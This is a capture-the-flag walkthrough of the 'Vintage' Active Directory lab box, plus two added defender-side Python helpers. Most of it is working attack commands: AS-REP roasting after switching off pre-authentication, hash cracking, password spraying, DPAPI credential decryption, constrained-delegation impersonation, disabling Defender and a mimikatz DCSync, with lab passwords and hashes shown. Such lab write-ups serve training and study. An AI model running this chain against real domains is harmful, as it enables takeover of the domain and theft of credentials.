This writeup walks through the Vintage Capture The Flag (CTF) challenge, a hard-level box, and lays out each step plainly so that the key concepts stay accessible to players at this level.

Add Hosts

10.10.11.45 dc01.vintage.htb vintage.htb

Script to add hosts automatically

ip="10.10.11.45"
domain="dc01.vintage.htb vintage.htb"
# append the entry only if an identical line is not already in /etc/hosts
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV vintage.htb -Pn
Nmap scan report for vintage.htb (10.10.11.45)
Host is up (0.054s latency).
rDNS record for 10.10.11.45: dc01.vintage.htb
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-03 23:59:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-04T00:00:04
|_  start_date: N/A
|_clock-skew: -8s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Provided credentials: P.Rosa : Rosaisbest123

bloodhound

LDAP user list

ldapsearch -x -H ldap://10.10.11.45 -D "P.Rosa@vintage.htb" -w "Rosaisbest123" -b "DC=vintage,DC=htb" "(objectClass=user)" sAMAccountName | grep "sAMAccountName:" | cut -d " " -f 2 > usernames.txt

Kerberos Tickets

getTGT.py -dc-ip 10.10.11.45 'vintage.htb/FS01$:fs01'
export KRB5CCNAME=FS01\$.ccache
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword
getTGT.py 'vintage.htb/GMSA01$' -hashes 'aad3b435b51404eeaad3b435b51404ee:a317f224b45046c1446372c4dc06ae53'
export KRB5CCNAME=GMSA01\$.ccache
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
getTGT.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip dc01.vintage.htb
export KRB5CCNAME=P.Rosa.ccache

ASREPRoasting

Disable PREAUTH

bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH

Enable Accounts

bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_ARK -f ACCOUNTDISABLE
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_LDAP -f ACCOUNTDISABLE
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE
GetNPUsers.py -dc-ip 10.10.11.45 -request -usersfile usernames.txt vintage.htb/
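The bloodyad steps above work by flipping bits in userAccountControl: setting DONT_REQ_PREAUTH and clearing ACCOUNTDISABLE. The following is an added defender-side example, not part of the original writeup: it decodes userAccountControl values from ldapsearch-style output and reports which accounts are AS-REP roastable now and which would become so if re-enabled. The LDAP records, DNs and flag values are constructed.

```python
# userAccountControl bit flags (values from Microsoft's MS-SAMR documentation)
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "DONT_REQ_PREAUTH": 0x400000,
}

# Constructed sample shaped like "ldapsearch ... sAMAccountName userAccountControl"
# output: svc_sql enabled with pre-auth off, svc_ldap the same but still disabled.
SAMPLE_LDAP = """\
dn: CN=svc_sql,OU=ServiceAccounts,DC=vintage,DC=htb
sAMAccountName: svc_sql
userAccountControl: 4260352

dn: CN=svc_ldap,OU=ServiceAccounts,DC=vintage,DC=htb
sAMAccountName: svc_ldap
userAccountControl: 4260354

dn: CN=C.Neri,OU=Users,DC=vintage,DC=htb
sAMAccountName: C.Neri
userAccountControl: 66048
"""

def decode_uac(value):
    """Return the names of the flags set in a userAccountControl integer."""
    return {name for name, bit in UAC_FLAGS.items() if value & bit}

def parse_ldap_entries(text):
    """Split LDIF-style output into one {attribute: value} dict per entry."""
    entries = []
    for block in text.strip().split("\n\n"):
        entries.append(dict(line.partition(": ")[::2] for line in block.splitlines() if ": " in line))
    return entries

def find_asrep_roastable(text):
    """Map each account with DONT_REQ_PREAUTH set to a finding; a disabled one is
    roastable as soon as ACCOUNTDISABLE is cleared, the change made above."""
    findings = {}
    for entry in parse_ldap_entries(text):
        flags = decode_uac(int(entry["userAccountControl"]))
        if "DONT_REQ_PREAUTH" not in flags:
            continue
        disabled = "ACCOUNTDISABLE" in flags
        findings[entry["sAMAccountName"]] = (
            "disabled, roastable if re-enabled" if disabled else "ENABLED and AS-REP roastable now"
        )
    return findings
```

Run `find_asrep_roastable` over real `ldapsearch` output (with the two attributes requested) to spot the same change on a live domain.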

Resulting hash

$krb5asrep$23$svc_sql@VINTAGE.HTB:c65f23feb7e3e10c87e6d1a3a432a9cf$7e3d9e28272e1d10795a0c482b3eb538096577268c8721662befadf2367f5e9bd93dbc458e1b86d0b384005c0cab7e0136acebf277e6db07971a34bb1cb9a58178f4cf05ea3d1b4e4737590ecdf024bba30cd1e0391cb771a26a62374acb61c0253354fd043082c8b21d8eda40957a68a7552d9be122a5bbfa1ca666817c6eaaec5f0ac1083bfb98b1e0e4065f140d8bebefe877ab070e91c6d24d33cacac1105e4517d347af3b5c10ff9b707b2d7b43867d0b3f0556c2130c4cd67d08dfa9fac0571f1df6de7c3bdbcbf39d6121380d38120ff210ff74219fd9fe6ba551e03de9301bef3cbe948b820e

Brute Force the Hash

echo -n "Password Hash? --> " ; read -r hash
echo "$hash" > /tmp/hash.txt
# -m 18200 = Kerberos 5 AS-REP, etype 23 ($krb5asrep$23$...)
hashcat -m 18200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 18200 /tmp/hash.txt --show
rm -f /tmp/hash.txt

This yields Zer0the0ne
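The $krb5asrep$ line above has a fixed layout that hashcat, and anyone triaging a roasting alert, needs to read. This is an added Python example, not from the original writeup: it parses the GetNPUsers output format into its fields (etype, account, realm, checksum, encrypted data), maps etype 23 to hashcat mode 18200 as used above, and rejects malformed lines. The sample hash is constructed from dummy hex.

```python
import re
from dataclasses import dataclass

# GetNPUsers.py layout: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<enc-data>
# For etype 23 (RC4-HMAC) the checksum is a 16-byte HMAC-MD5, i.e. 32 hex characters.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@:]+)@(?P<realm>[^:$]+)"
    r":(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Only the etype seen on this page is mapped; anything else is reported as unknown (None).
HASHCAT_MODES = {23: 18200}

@dataclass
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum: str
    edata: str

    @property
    def hashcat_mode(self):
        return HASHCAT_MODES.get(self.etype)

def parse_asrep(line):
    """Parse one krb5asrep line into its fields, raising ValueError on malformed input."""
    m = ASREP_RE.match(line.strip())
    if m is None:
        raise ValueError("not a $krb5asrep$ hash line")
    if len(m["edata"]) % 2:
        raise ValueError("encrypted data is not a whole number of bytes")
    return AsRepHash(int(m["etype"]), m["user"], m["realm"],
                     m["checksum"].lower(), m["edata"].lower())

def is_asrep_line(line):
    """True if the line parses cleanly; useful for filtering tool output or alert text."""
    try:
        parse_asrep(line)
        return True
    except ValueError:
        return False

# Constructed sample: same layout as the hash above but dummy hex, not the real ciphertext.
SAMPLE = "$krb5asrep$23$svc_sql@VINTAGE.HTB:" + "ab" * 16 + "$" + "cd" * 40
```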

kerbrute --dc vintage.htb -d vintage.htb -v passwordspray usernames.txt Zer0the0ne

C.Neri@vintage.htb:Zer0the0ne

Remember, /etc/krb5.conf is needed, but make sure to remove it after pwning the box, as it can interfere with future pwns.

getTGT.py vintage.htb/c.neri:Zer0the0ne -dc-ip vintage.htb
sudo tee /etc/krb5.conf <<'EOF'
[libdefaults]
    default_realm = VINTAGE.HTB
    dns_lookup_kdc = false
    rdns = false

[realms]
    VINTAGE.HTB = {
        kdc = 10.10.11.45
        admin_server = 10.10.11.45
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB
EOF
export KRB5CCNAME=c.neri.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb
cat ../Desktop/user.txt
whoami /priv

DPAPI Credentials

The WinRM download wasn’t working until I removed its hidden property, though I’m not sure why.

cd 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials'
Set-ItemProperty -Path .\C4BB96844A5C9DD45D5B6A9859252BA6 -Name Attributes -Value ([System.IO.FileAttributes]::Normal)
download C4BB96844A5C9DD45D5B6A9859252BA6
cd 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115'
Set-ItemProperty -Path '.\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b' -Name Attributes -Value ([System.IO.FileAttributes]::Normal)
download '99cf41a3-a552-4cf7-a8d7-aca2d6f7339b'

Local:

dpapi.py masterkey -file '99cf41a3-a552-4cf7-a8d7-aca2d6f7339b' -sid 'S-1-5-21-4024337825-2033394866-2055507597-1115' -password Zer0the0ne
dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key '0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a'

c.neri_adm:Uncr4ck4bl3P4ssW0rd0312

Delegation and SPN Attack

export KRB5CCNAME=c.neri.ccache
bloodyad -k --host dc01.vintage.htb -d VINTAGE.HTB remove uac SVC_SQL -f ACCOUNTDISABLE
bloodyad -k --host dc01.vintage.htb -d VINTAGE.HTB set object 'SVC_SQL' servicePrincipalName -v "cifs/x"
getTGT.py -dc-ip 10.10.11.45 'VINTAGE.HTB/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
export KRB5CCNAME=c.neri_adm.ccache
bloodyad -k --host dc01.vintage.htb -d vintage.htb add groupMember "delegatedadmins" "svc_sql"
getTGT.py -dc-ip 10.10.11.45 'VINTAGE.HTB/svc_sql:Zer0the0ne'
export KRB5CCNAME=svc_sql.ccache
getST.py -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'
export KRB5CCNAME=L.BIANCHI_ADM.ccache
wmiexec.py -k -no-pass VINTAGE.HTB/L.BIANCHI_ADM@dc01.vintage.htb -dc-ip 10.10.11.45
type Users\Administrator\Desktop\root.txt
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $True"
lput ./.local/www/win/creds/mimikatz.exe
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator" "exit"

468c7497513f8243b59980f2240a10de